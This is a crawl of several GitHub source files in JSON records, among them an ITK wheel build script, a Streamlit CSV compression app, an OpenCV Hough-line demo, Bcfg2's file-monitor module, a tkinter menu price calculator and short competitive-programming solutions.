requirements_file])\n check_call([pip, \"install\", \"cmake\"])\n check_call([pip, \"install\", \"scikit_build\"])\n check_call([pip, \"install\", \"ninja\"])\n\n build_type = \"Release\"\n source_path = ROOT_DIR\n itk_build_path = os.path.abspath(\"%s/ITK-win_%s\" % (os.path.join(SCRIPT_DIR, '..'), py_env))\n print('ITKDIR: %s' % itk_build_path)\n\n # Generate wheel\n check_call([\n python_executable,\n \"setup.py\", \"bdist_wheel\",\n \"--build-type\", build_type, \"-G\", \"Ninja\",\n \"--\",\n \"-DCMAKE_MAKE_PROGRAM:FILEPATH=%s\" % ninja_executable,\n \"-DITK_DIR:PATH=%s\" % itk_build_path,\n \"-DWRAP_ITK_INSTALL_COMPONENT_IDENTIFIER:STRING=PythonWheel\",\n \"-DSWIG_EXECUTABLE:FILEPATH=%s/Wrapping/Generators/SwigInterface/swig/bin/swig.exe\" % itk_build_path,\n \"-DITK_WRAP_unsigned_short:BOOL=ON\",\n \"-DBUILD_TESTING:BOOL=OFF\",\n \"-DPYTHON_EXECUTABLE:FILEPATH=%s\" % python_executable,\n \"-DPYTHON_INCLUDE_DIR:PATH=%s\" % python_include_dir,\n \"-DPYTHON_LIBRARY:FILEPATH=%s\" % python_library\n ])\n # Cleanup\n check_call([python_executable, \"setup.py\", \"clean\"])\n\nif __name__ == '__main__':\n build_wheels()\n","repo_name":"QianyeYang/ITKPythonPackage","sub_path":"scripts/windows_build_module_wheels.py","file_name":"windows_build_module_wheels.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"11940133040","text":"# ------------------------------------------------------------------------------\n# Project : The Very First Daisi Hackathon\n# File : data_compression.py\n# Create on :\n# Purpose :\n# This python file is developed for The Very First Daisi Hackathon .\n# This function will compress the csv/json and db table also.\n# I have developed csvfile compression function to compress csv file\n# ------------------------------------------------------------------------------\n#!/usr/bin/env python\n# coding: utf-8\n\n# ------------------------------------------------------------------------------\n# Call required packages\n# ------------------------------------------------------------------------------\nimport pandas as pd\nimport numpy as np\nimport datetime\nfrom pandas.errors import ParserError\nimport sys\nimport zipfile\nimport streamlit as st\nimport time\nimport os\nimport math\npd.options.mode.chained_assignment = None # default='warn'\n\n# ------------------------------------------------------------------------------\n# -- UDF's --\n# ------------------------------------------------------------------------------\n\nclass data_compression:\n def __init__(self):\n print(\"Welcome to Data Compression\")\n\n def getInputDF(self):\n return self.df_input\n\n def getCompDF(self):\n return self.df_final\n\n def convert_bytes(self,size):\n for x in ['Bytes', 'KB', 'MB', 'GB', 'TB']:\n if size < 1024.0:\n return \"%3.1f %s\" % (size, x)\n size /= 1024.0\n\n def file_size(self,file):\n if os.path.isfile(file):\n file_info = os.stat(file)\n return self.convert_bytes(file_info.st_size),file_info.st_size\n\n def listToDict(self,b):\n s = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/'\n if b==\"b\":\n return {s[i]:i for i in range(len(s))}\n else:\n return {i:s[i] for i in range(len(s))}\n\n def base64_to_base10(self,b64dec,datatype=None):\n conversion_table = self.listToDict(\"b\")\n\n if datatype == \"f\":\n x=b64dec.split(\".\")[0]\n y=b64dec.split(\".\")[1]\n\n x_dec=0\n x_power = len(x)-1\n for x_digit in x:\n x_dec += conversion_table[x_digit]*64**x_power\n x_power -= 
1\n\n y_dec,z,f=0,0,0\n y_power = len(y)-1\n for y_digit in y:\n if y_digit==\"0\" and f==0:\n z=z+1\n else:\n f=1\n y_dec += conversion_table[y_digit]*64**y_power\n y_power -= 1\n\n return str(x_dec)+\".\"+str(\"\").zfill(z)+str(y_dec)\n else:\n decimal = 0\n power = len(b64dec) -1\n for digit in b64dec:\n decimal += conversion_table[digit]*64**power\n power -= 1\n return decimal\n\n def base10_to_base64(self,decimal,datatype=None):\n conversion_table = self.listToDict(\"d\")\n\n if datatype == \"f\":\n x=int(str(decimal).split(\".\")[0])\n y=str(decimal).split(\".\")[1].strip()\n z=len(y)-len(str(int(y)))\n y=int(y)\n\n x_rem=0\n x_b64dec=''\n while(x > 0):\n x_rem = x % 64\n x_b64dec = conversion_table[x_rem] + x_b64dec\n x = x // 64\n\n y_rem=0\n y_b64dec=''\n while(y > 0):\n y_rem = y % 64\n y_b64dec = conversion_table[y_rem] + y_b64dec\n y = y // 64\n return x_b64dec+\".\"+str(\"\").zfill(z)+y_b64dec\n else:\n b64dec = ''\n remainder=0\n while(decimal > 0):\n remainder = decimal % 64\n b64dec = conversion_table[remainder] + b64dec\n decimal = decimal // 64\n return b64dec\n\n# ------------------------------------------------------------------------------\n## Function Name: file_compress\n## Input : mapping and csvfile as a first parameter and 2nd = output file\n## This is normal file compression function and this is similar to winzip/7z\n# ------------------------------------------------------------------------------\n def file_compress(self,inp_file_names, out_zip_file):\n compression = zipfile.ZIP_DEFLATED\n print(f\" *** Input File name passed for zipping - {inp_file_names}\")\n print(f' *** out_zip_file is - {out_zip_file}')\n zf = zipfile.ZipFile(out_zip_file, mode=\"w\")\n\n try:\n for file_to_write in inp_file_names:\n print(f' *** Processing file {file_to_write}')\n zf.write(file_to_write, file_to_write, compress_type=compression)\n except FileNotFoundError as e:\n print(f' *** Exception occurred during zip process - {e}')\n finally:\n zf.close()\n\n# ------------------------------------------------------------------------------\n## Function Name: csvfile_compression and Input : Csv file file full path\n## To applied 5 different algorithm to compress the csv file\n## 1.Mapping for repeated data [completed]\n## 2.Group by for repeated data\n## 3.Date values convert into int format [completed]\n## 4.Convert Base10 to Base64 for integer Values [completed]\n## 5.Concatenate all the rows and make it single text [completed]\n## final file will be compressed with normal compression function like winzip\n# ------------------------------------------------------------------------------\n def csvfile_compression(self,filepath):\n try:\n train_df=pd.read_csv(filepath)\n #msg=\"Source file's size:\"+str(train_df.size)\n df_map=[]\n df_col={col:len(train_df[col].unique()) for col in train_df.columns}\n df_dt=[train_df[col].dtypes for col in train_df.columns ]\n key_srtby=\"\"\n\n for col in train_df.columns:\n col_len=len(train_df[col].unique())\n print(\"Column Name:\",col,\"|Unique Cnt:\",col_len,\"|DataType:\",train_df[col].dtypes,\"| DateTime:\",datetime.datetime.now())\n if col_len < 3000 :\n df_unique=train_df[col].unique()\n s=\",\".join(map(str,df_unique))\n train_df[col] = train_df[col].replace(df_unique[0:int(col_len/2)],[a for a in range(int(col_len/2))])\n train_df[col] = train_df[col].replace(df_unique[int(col_len/2)-1:col_len],[a for a in range(int(col_len/2)-1,col_len)])\n train_df[col] = train_df[col].apply(lambda x: x if np.isnan(x) else self.base10_to_base64(int(x)))\n 
elif train_df[col].dtypes=='int64':\n #print(\"Base64 Conversion...\",train_df[col].dtypes)\n train_df[col] = train_df[col].apply(lambda x: x if np.isnan(x) else self.base10_to_base64(int(x)))\n s=\"b\"\n elif train_df[col].dtypes=='object':\n try:\n train_df[col] = pd.to_datetime(train_df[col]).view(int) // 10 ** 9\n train_df[col] = train_df[col].apply(lambda x: x if np.isnan(x) else self.base10_to_base64(int(x)))\n #print(\"Date Column:\",col)\n s=\"d\"\n except (ParserError,ValueError):\n pass\n elif train_df[col].dtypes=='float64':\n train_df[col] = train_df[col].apply(lambda x: x if np.isnan(x) else self.base10_to_base64(x,\"f\"))\n s=\"f\"\n else: # or train_df[col].dtypes=='float64':\n s=\"n\"\n df_map.append(s)\n df_map.append(str(df_col))\n df_map.append(str(df_dt))\n\n print(train_df.head())\n return \"Success\",df_map,train_df\n\n except Exception as ex:\n print(\"Error:\"+str(ex))\n df=[]\n return \"Failed!...\"+str(ex),df,df\n\n def save_output_files(self,df_map,train_df,file_mapping,file_compressed,zip_file_name):\n try:\n with open(file_mapping, 'w') as f:\n f.write(\"|\".join(df_map))\n\n df_comp=[]\n for col in train_df.columns:\n s=\",\".join(map(str,train_df[col]))\n df_comp.append(s)\n\n with open(file_compressed, 'w') as f:\n f.write(\"|\".join(df_comp))\n\n file_name_list = [file_mapping, file_compressed]\n self.file_compress(file_name_list, zip_file_name)\n return \"success\"\n except Exception as ex:\n print(\"Error:\"+str(ex))\n df=[]\n return \"Failed!...\"+str(ex)\n\n\n# ------------------------------------------------------------------------------\n# Call main function using csv file as a input\n# This main function is used for testing purpose from WebUI\n# ------------------------------------------------------------------------------\ndef s_ui():\n try:\n st.set_page_config(layout = \"wide\")\n st.title(\"Data Compression\")\n st.info(\"Developed by Chinnappar & Team (R-AI)\")\n with st.expander(\"ℹ️ - About this app\", expanded=True):\n st.write(\n \"\"\"\n - Data compression is performed by a program that uses a formula/algorithm to determine how to shrink the size of the data.\n - Applied 5 different formulas/algorithms to compress pandas' dataframe and find the details below:\n - Mapping for repeated data\n - Group by for repeated data\n - Date values convert into epoch format\n - Convert Base10 to Base64 for integer Values\n - Concatenate all the rows and make it single text!\n \"\"\"\n )\n st.write(\"#### Data Compression for CSV file:\")\n file_mapping='mapping2.txt'\n file_compressed='compressed.txt'\n zip_file_name = 'output.zip'\n\n if st.button(\"Test\"):\n compression = data_compression()\n test_file=\"training_data_sales_10k.csv\"\n msg,df_map,train_df=compression.csvfile_compression(test_file)\n if \"failed\" in msg:\n st.error(msg)\n\n msg=compression.save_output_files(df_map,train_df,file_mapping,file_compressed,zip_file_name)\n if \"failed\" in msg:\n st.error(msg)\n\n st.info(\"Data compression is completed for test file. 
Please find the details below...\")\n ftest_size,test_size=compression.file_size(test_file)\n ftmap_size,tmap_size=compression.file_size(file_mapping)\n ftcomp_size,tcomp_size=compression.file_size(file_compressed)\n ftzip_size,tzip_size=compression.file_size(zip_file_name)\n tnumber=\"{:.2%}\".format((test_size-(tcomp_size+tmap_size))/test_size)\n\n df_test=pd.read_csv(test_file)\n with st.expander(\"ℹ️ - Sample Data:\", expanded=True):\n st.write(df_test.head())\n with st.expander(\"ℹ️ - Compressed - Sample Data:\", expanded=True):\n st.write(train_df.head())\n with st.expander(\"ℹ️ - Test File Results:\", expanded=True):\n st.write(\n f'''\n - Test File Details- File Name: {test_file} File Type: csv File Size: {ftest_size}\n - Size of mapping file which is used for decompression: {ftmap_size}\n - Size of compression csv file: {ftcomp_size}\n - Size of zipped file for above two: {ftzip_size}\n '''\n )\n with st.expander(\"ℹ️ - Test File Compression %:\", expanded=True):\n st.write(\n f'''\n - Test file is compressed - {tnumber}\n '''\n )\n\n csv_file = st.file_uploader(\"Please upload your own csv file\", type=['csv'], accept_multiple_files=False)\n if csv_file is not None:\n compression = data_compression()\n msg,df_map,train_df=compression.csvfile_compression(csv_file)\n if \"failed\" in msg:\n st.error(msg)\n\n msg=compression.save_output_files(df_map,train_df,file_mapping,file_compressed,zip_file_name)\n if \"failed\" in msg:\n st.error(msg)\n\n st.info(\"Data compression is completed for your CSV file. Please download the Zip.\")\n csv_size=csv_file.size\n fmap_size,map_size=compression.file_size(file_mapping)\n fcomp_size,comp_size=compression.file_size(file_compressed)\n fzip_size,zip_size=compression.file_size(zip_file_name)\n number=\"{:.2%}\".format((csv_size-(comp_size+map_size))/csv_size)\n\n with st.expander(\"ℹ️ - Compressed - Sample Data:\", expanded=True):\n st.write(train_df.head())\n\n with st.expander(\"ℹ️ - Results:\", expanded=True):\n st.write(\n f'''\n - Uploaded File Details- File Name: {csv_file.name} File Type: {csv_file.type} File Size: {compression.convert_bytes(csv_size)}\n - Size of mapping file which is used for decompression: {fmap_size}\n - Size of compression csv file: {fcomp_size}\n - Size of zipped file for above two: {fzip_size}\n '''\n )\n\n with st.expander(\"ℹ️ - Compression %:\", expanded=True):\n st.write(\n f'''\n - Your csv file is compressed - {number}\n '''\n )\n\n with open(zip_file_name, \"rb\") as fp:\n btn = st.download_button(\n label=\"Download ZIP\",\n data=fp,\n file_name=zip_file_name,\n mime=\"application/zip\"\n )\n #st.write(file_size(csv_file))\n\n except Exception as ex:\n st.error(\"Failed!:... 
\"+str(ex))\n\n# ------------------------------------------------------------------------------\n# Call main function using csv file as a input\n# This main function is used for testing purpose from local system\n# ------------------------------------------------------------------------------\ndef compression(csvfile='training_data_sales_10k.csv',file_mapping='mapping.txt',file_compressed='compressed.txt',zip_file_name='output.zip'):\n test_file=csvfile\n #file_mapping='mapping.txt'\n #file_compressed='compressed.txt'\n #zip_file_name = \"output.zip\"\n comp = data_compression()\n msg,df_map,train_df=comp.csvfile_compression(test_file)\n comp.save_output_files(df_map,train_df,file_mapping,file_compressed,zip_file_name)\n\n ftest_size,test_size=comp.file_size(test_file)\n ftmap_size,tmap_size=comp.file_size(file_mapping)\n ftcomp_size,tcomp_size=comp.file_size(file_compressed)\n ftzip_size,tzip_size=comp.file_size(zip_file_name)\n tnumber=\"{:.2%}\".format((test_size-(tcomp_size+tmap_size))/test_size)\n\n print(\"\")\n print(\"Result - Test CSV File...\")\n print(f\"Test File Details- Input File Name: {test_file} | File Type: csv | File Size: {ftest_size}\")\n print(f\"Size of mapping file which is used for decompression- Output File Name: {file_mapping} | File Size: {ftmap_size}\")\n print(f\"Size of compression csv file- Output File Name: {file_compressed} | File Size: {ftcomp_size}\")\n print(f\"Size of zipped file for above two- Output File Name: {zip_file_name} | File Size: {ftzip_size}\")\n print(\"\")\n print(\"Saving...\")\n print(f\"Test file is compressed - {tnumber}\")\n return True\n\nif __name__ == \"__main__\":\n try:\n print(\"Started - DateTime:\",datetime.datetime.now())\n compression()\n s_ui()\n print(\"compression is completed...\")\n print(\"End - DateTime:\",datetime.datetime.now())\n\n except Exception as msg:\n print(f'''Error {msg}''')\n","repo_name":"chinnappar-antony/datacompression","sub_path":"data_compression.py","file_name":"data_compression.py","file_ext":"py","file_size_in_byte":15947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71994069802","text":"import cv2\nimport numpy as np\n\nimage = cv2.imread('./images/road.jpg')\ngray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\ncanny = cv2.Canny(gray,50,150,apertureSize=3)\nlines = cv2.HoughLinesP(canny , 1 , np.pi/180 , 200 , minLineLength=100, maxLineGap=10)\n\nfor line in lines:\n x1,y1,x2,y2 = line[0]\n cv2.line(image,(x1,y1),(x2,y2),(0,255,0),2)\n\ncv2.imshow('image',image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n","repo_name":"jamAL108/Computer_vision","sub_path":"openCV_learn/probabilistic_Hough_Line.py","file_name":"probabilistic_Hough_Line.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28379798869","text":"\"\"\"Bcfg2.Server.FileMonitor provides the support for monitorung files.\"\"\"\n\nimport logging\nimport os\nimport stat\nfrom time import sleep, time\n\nlogger = logging.getLogger('Bcfg2.Server.FileMonitor')\n\n\ndef ShouldIgnore(event):\n \"\"\"Test if the event should be suppresed.\"\"\"\n # FIXME should move event suppression out of the core\n if event.filename.split('/')[-1] == '.svn':\n return True\n if event.filename.endswith('~') or \\\n event.filename.startswith('#') or event.filename.startswith('.#'):\n #logger.error(\"Suppressing event for file %s\" % (event.filename))\n return True\n return False\n\n\nclass 
Event(object):\n def __init__(self, request_id, filename, code):\n self.requestID = request_id\n self.filename = filename\n self.action = code\n\n def code2str(self):\n \"\"\"return static code for event\"\"\"\n return self.action\n\navailable = {}\n\n\nclass FileMonitor(object):\n \"\"\"File Monitor baseclass.\"\"\"\n def __init__(self, debug=False):\n object.__init__(self)\n self.debug = debug\n self.handles = dict()\n\n def get_event(self):\n return None\n\n def pending(self):\n return False\n\n def fileno(self):\n return 0\n\n def handle_one_event(self, event):\n if ShouldIgnore(event):\n return\n if event.requestID not in self.handles:\n logger.info(\"Got event for unexpected id %s, file %s\" %\n (event.requestID, event.filename))\n return\n if self.debug:\n logger.info(\"Dispatching event %s %s to obj %s\" \\\n % (event.code2str(), event.filename,\n self.handles[event.requestID]))\n try:\n self.handles[event.requestID].HandleEvent(event)\n except:\n logger.error(\"error in handling of gamin event for %s\" % \\\n (event.filename), exc_info=1)\n\n def handle_event_set(self, lock=None):\n count = 1\n event = self.get_event()\n start = time()\n if lock:\n lock.acquire()\n try:\n self.handle_one_event(event)\n while self.pending():\n self.handle_one_event(self.get_event())\n count += 1\n except:\n pass\n if lock:\n lock.release()\n end = time()\n logger.info(\"Handled %d events in %.03fs\" % (count, (end - start)))\n\n def handle_events_in_interval(self, interval):\n end = time() + interval\n while time() < end:\n if self.pending():\n self.handle_event_set()\n end = time() + interval\n else:\n sleep(0.5)\n\n\nclass FamFam(object):\n \"\"\"The fam object is a set of callbacks for\n file alteration events (FAM support).\n \"\"\"\n\n def __init__(self):\n object.__init__(self)\n self.fm = _fam.open()\n self.users = {}\n self.handles = {}\n self.debug = False\n\n def fileno(self):\n \"\"\"Return fam file handle number.\"\"\"\n return self.fm.fileno()\n\n def handle_event_set(self, _):\n self.Service()\n\n def handle_events_in_interval(self, interval):\n now = time()\n while (time() - now) < interval:\n if self.Service():\n now = time()\n\n def AddMonitor(self, path, obj):\n \"\"\"Add a monitor to path, installing a callback to obj.HandleEvent.\"\"\"\n mode = os.stat(path)[stat.ST_MODE]\n if stat.S_ISDIR(mode):\n handle = self.fm.monitorDirectory(path, None)\n else:\n handle = self.fm.monitorFile(path, None)\n self.handles[handle.requestID()] = handle\n if obj != None:\n self.users[handle.requestID()] = obj\n return handle.requestID()\n\n def Service(self, interval=0.50):\n \"\"\"Handle all fam work.\"\"\"\n count = 0\n collapsed = 0\n rawevents = []\n start = time()\n now = time()\n while (time() - now) < interval:\n if self.fm.pending():\n while self.fm.pending():\n count += 1\n rawevents.append(self.fm.nextEvent())\n now = time()\n unique = []\n bookkeeping = []\n for event in rawevents:\n if ShouldIgnore(event):\n continue\n if event.code2str() != 'changed':\n # process all non-change events\n unique.append(event)\n else:\n if (event.filename, event.requestID) not in bookkeeping:\n bookkeeping.append((event.filename, event.requestID))\n unique.append(event)\n else:\n collapsed += 1\n for event in unique:\n if event.requestID in self.users:\n try:\n self.users[event.requestID].HandleEvent(event)\n except:\n logger.error(\"handling event for file %s\" % (event.filename), exc_info=1)\n end = time()\n logger.info(\"Processed %s fam events in %03.03f seconds. 
%s coalesced\" %\n (count, (end - start), collapsed))\n return count\n\n\nclass Fam(FileMonitor):\n \"\"\"\n The fam object is a set of callbacks for\n file alteration events (FAM support).\n \"\"\"\n\n def __init__(self, debug=False):\n FileMonitor.__init__(self, debug)\n self.fm = _fam.open()\n\n def fileno(self):\n return self.fm.fileno()\n\n def AddMonitor(self, path, obj):\n \"\"\"Add a monitor to path, installing a callback to obj.HandleEvent.\"\"\"\n mode = os.stat(path)[stat.ST_MODE]\n if stat.S_ISDIR(mode):\n handle = self.fm.monitorDirectory(path, None)\n else:\n handle = self.fm.monitorFile(path, None)\n if obj != None:\n self.handles[handle.requestID()] = obj\n return handle.requestID()\n\n def pending(self):\n return self.fm.pending()\n\n def get_event(self):\n return self.fm.nextEvent()\n\n\nclass Pseudo(FileMonitor):\n \"\"\"\n The fam object is a set of callbacks for\n file alteration events (static monitor support).\n \"\"\"\n\n def __init__(self, debug=False):\n FileMonitor.__init__(self, debug=False)\n self.pending_events = []\n\n def pending(self):\n return len(self.pending_events) != 0\n\n def get_event(self):\n return self.pending_events.pop()\n\n def AddMonitor(self, path, obj):\n \"\"\"add a monitor to path, installing a callback to obj.HandleEvent\"\"\"\n handleID = len(list(self.handles.keys()))\n mode = os.stat(path)[stat.ST_MODE]\n handle = Event(handleID, path, 'exists')\n if stat.S_ISDIR(mode):\n dirList = os.listdir(path)\n self.pending_events.append(handle)\n for includedFile in dirList:\n self.pending_events.append(Event(handleID,\n includedFile,\n 'exists'))\n self.pending_events.append(Event(handleID, path, 'endExist'))\n else:\n self.pending_events.append(Event(handleID, path, 'exists'))\n if obj != None:\n self.handles[handleID] = obj\n return handleID\n\n\ntry:\n from gamin import WatchMonitor, GAMCreated, GAMExists, GAMEndExist, \\\n GAMChanged, GAMDeleted, GAMMoved\n\n class GaminEvent(Event):\n \"\"\"\n This class provides an event analogous to\n python-fam events based on gamin sources.\n \"\"\"\n def __init__(self, request_id, filename, code):\n Event.__init__(self, request_id, filename, code)\n action_map = {GAMCreated: 'created', GAMExists: 'exists',\n GAMChanged: 'changed', GAMDeleted: 'deleted',\n GAMEndExist: 'endExist', GAMMoved: 'moved'}\n if code in action_map:\n self.action = action_map[code]\n\n class Gamin(FileMonitor):\n \"\"\"\n The fam object is a set of callbacks for\n file alteration events (Gamin support)\n \"\"\"\n def __init__(self, debug=False):\n FileMonitor.__init__(self, debug)\n self.mon = WatchMonitor()\n self.counter = 0\n self.events = []\n\n def fileno(self):\n return self.mon.get_fd()\n\n def queue(self, path, action, request_id):\n \"\"\"queue up the event for later handling\"\"\"\n self.events.append(GaminEvent(request_id, path, action))\n\n def AddMonitor(self, path, obj):\n \"\"\"Add a monitor to path, installing a callback to obj.HandleEvent.\"\"\"\n handle = self.counter\n self.counter += 1\n mode = os.stat(path)[stat.ST_MODE]\n\n # Flush queued gamin events\n while self.mon.event_pending():\n self.mon.handle_one_event()\n\n if stat.S_ISDIR(mode):\n self.mon.watch_directory(path, self.queue, handle)\n else:\n self.mon.watch_file(path, self.queue, handle)\n self.handles[handle] = obj\n return handle\n\n def pending(self):\n return len(self.events) > 0 or self.mon.event_pending()\n\n def get_event(self):\n if self.mon.event_pending():\n self.mon.handle_one_event()\n return self.events.pop(0)\n\n available['gamin'] 
= Gamin\nexcept ImportError:\n # fall back to _fam\n pass\n\ntry:\n import _fam\n available['fam'] = FamFam\nexcept ImportError:\n pass\navailable['pseudo'] = Pseudo\n\nfor fdrv in ['gamin', 'fam', 'pseudo']:\n if fdrv in available:\n available['default'] = available[fdrv]\n break\n","repo_name":"solj/bcfg2-old","sub_path":"src/lib/Server/FileMonitor.py","file_name":"FileMonitor.py","file_ext":"py","file_size_in_byte":9761,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"} +{"seq_id":"27980032759","text":"# Złóż zamowienie !\r\n# Przykładowe menu jadłodajni z wielokrotną opcją wyboru\r\n# i podliczeniem całości kosztu\r\n\r\nfrom tkinter import *\r\n\r\nclass Menu(Frame):\r\n \"\"\" Aplikacja odzwierciedlająca restauracyjne menu.\r\n Można zamawiać różne potrawy czy napoje i dowiedzieć się\r\n od razu ile wyniesie całkowity koszt. \"\"\"\r\n def __init__(self, master):\r\n super(Menu, self).__init__(master)\r\n self.grid()\r\n self.create_widgets()\r\n\r\n def create_widgets(self):\r\n \"\"\" Utwórz widżety służące do wyboru potraw. \"\"\"\r\n # Etykieta z opisem\r\n Label(self,\r\n text = \"Wybierz to co byś chciał zamówić.\"\r\n ).grid(row = 0, column = 0, sticky = W)\r\n\r\n # Etykieta z instrukcją\r\n Label(self,\r\n text = \"Dolne okienko wyświetli sume pieniędzy do zapłaty\"\r\n ).grid(row = 1, column = 0, sticky = W)\r\n\r\n # Pola wyboru jedzenia\r\n self.kebab = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Kebab - 15zl\",\r\n variable = self.kebab,\r\n command = self.update_price\r\n ).grid(row = 2, column = 0, sticky = W)\r\n\r\n self.pizza = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Pizza - 20zl\",\r\n variable = self.pizza,\r\n command = self.update_price\r\n ).grid(row = 3, column = 0, sticky = W)\r\n\r\n self.hamburger = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Hamburger - 10zl\",\r\n variable = self.hamburger,\r\n command = self.update_price\r\n ).grid(row = 4, column = 0, sticky = W)\r\n\r\n self.cheeseburger = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Cheeseburger - 11zl\",\r\n variable = self.cheeseburger,\r\n command = self.update_price\r\n ).grid(row = 5, column = 0, sticky = W)\r\n\r\n self.pierogi = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Pierogi - 14zl\",\r\n variable = self.pierogi,\r\n command = self.update_price\r\n ).grid(row = 6, column = 0, sticky = W)\r\n\r\n self.placki = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Placki - 12zl\",\r\n variable = self.placki,\r\n command = self.update_price\r\n ).grid(row = 7, column = 0, sticky = W)\r\n\r\n self.cola = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Cola - 6zl\",\r\n variable = self.cola,\r\n command = self.update_price\r\n ).grid(row = 8, column = 0, sticky = W)\r\n\r\n self.herbata = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Herbata - 5zl\",\r\n variable = self.herbata,\r\n command = self.update_price\r\n ).grid(row = 9, column = 0, sticky = W)\r\n\r\n self.kawa = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Kawa - 9zl\",\r\n variable = self.kawa,\r\n command = self.update_price\r\n ).grid(row = 10, column = 0, sticky = W)\r\n\r\n self.piwo = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Piwo - 8zl\",\r\n variable = self.piwo,\r\n command = self.update_price\r\n ).grid(row = 11, column = 0, sticky = W)\r\n\r\n # Utwórz pole tekstowe do wyświetlania wyników\r\n self.price_txt = Text(self, width = 40, height = 5)\r\n self.price_txt.grid(row = 12, column = 0, columnspan = 3)\r\n\r\n def update_price(self):\r\n \"\"\" 
Zaktualizuj pole tekstowe z łączną ceną wybranych produktów. \"\"\"\r\n price = 0\r\n\r\n if self.kebab.get():\r\n price += 15\r\n\r\n if self.pizza.get():\r\n price += 20\r\n\r\n if self.hamburger.get():\r\n price += 10\r\n\r\n if self.cheeseburger.get():\r\n price += 11\r\n\r\n if self.pierogi.get():\r\n price += 14\r\n\r\n if self.placki.get():\r\n price += 12\r\n\r\n if self.cola.get():\r\n price += 6\r\n\r\n if self.herbata.get():\r\n price += 5\r\n\r\n if self.kawa.get():\r\n price += 9\r\n\r\n if self.piwo.get():\r\n price += 8\r\n\r\n # Wyświetl wyniki\r\n price2 = str(price) + \"zł\"\r\n self.price_txt.delete(0.0, END)\r\n self.price_txt.insert(0.0, price2)\r\n\r\n# część główna\r\nroot = Tk()\r\nroot.title(\"Menu\")\r\napp = Menu(root)\r\nroot.mainloop()","repo_name":"grokoko/Nauka","sub_path":"Rozdział 10/Zad 3.py","file_name":"Zad 3.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70845305644","text":"def rev(x):\n\tret = 0\n\twhile (x > 0):\n\t\tret = ret * 10 + x % 10\n\t\tx //= 10\n\treturn ret\n\na, b = map(int, input().split())\ntemp = rev(a) + rev(b)\ntemp = rev(temp)\nprint(temp)","repo_name":"famus2310/CP","sub_path":"TOKI/Dasar/10/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20440516728","text":"def arrowcount():\n n = int(input())\n loves = {a: b for _ in range(n) for a, b in [input().split()]}\n if n & 1:\n return -1\n lovecount = {k: 0 for k in loves.keys()}\n unloved = {k for k in loves.keys()}\n for v in loves.values():\n lovecount[v] += 1\n unloved.discard(v)\n loves = {k: v for k, v in loves.items() if v == k or loves[v] != k}\n cuts = 0\n while len(loves):\n if not len(unloved):\n unloved.add(next(iter(loves)))\n while len(unloved):\n u = unloved.pop()\n v = loves[u]\n loves.pop(u)\n if v in loves.keys():\n w = loves[v]\n if w in loves.keys():\n lovecount[w] -= 1\n if lovecount[w] == 0:\n unloved.add(w)\n loves.pop(v)\n cuts += 1\n return cuts\n\n\nprint(arrowcount())","repo_name":"DubiousDoggo/programming-challenges","sub_path":"kattis/lovepolygon.py","file_name":"lovepolygon.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21569342947","text":"class Solution:\n def solve(self, board: List[List[str]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n def dfs(x, y):\n if x < 0 or x >= len(board) or y < 0 or y >= len(board[0]) or board[x][y] == \"X\" or (x, y) in visited:\n return \n visited.add((x, y))\n dfs(x + 1, y)\n dfs(x - 1, y)\n dfs(x, y + 1)\n dfs(x, y - 1)\n\n visited = set()\n for i in range(len(board)):\n # left and right\n dfs(i, 0)\n dfs(i, len(board[0]) - 1)\n \n for i in range(len(board[0])):\n # upper and lower\n dfs(0, i)\n dfs(len(board) - 1, i)\n \n\n for i in range(len(board)):\n for j in range(len(board[0])):\n if (i, j) not in visited and board[i][j] == \"O\":\n board[i][j] = \"X\"\n ","repo_name":"wctseng99/leetcode-record","sub_path":"0130-surrounded-regions/0130-surrounded-regions.py","file_name":"0130-surrounded-regions.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} 
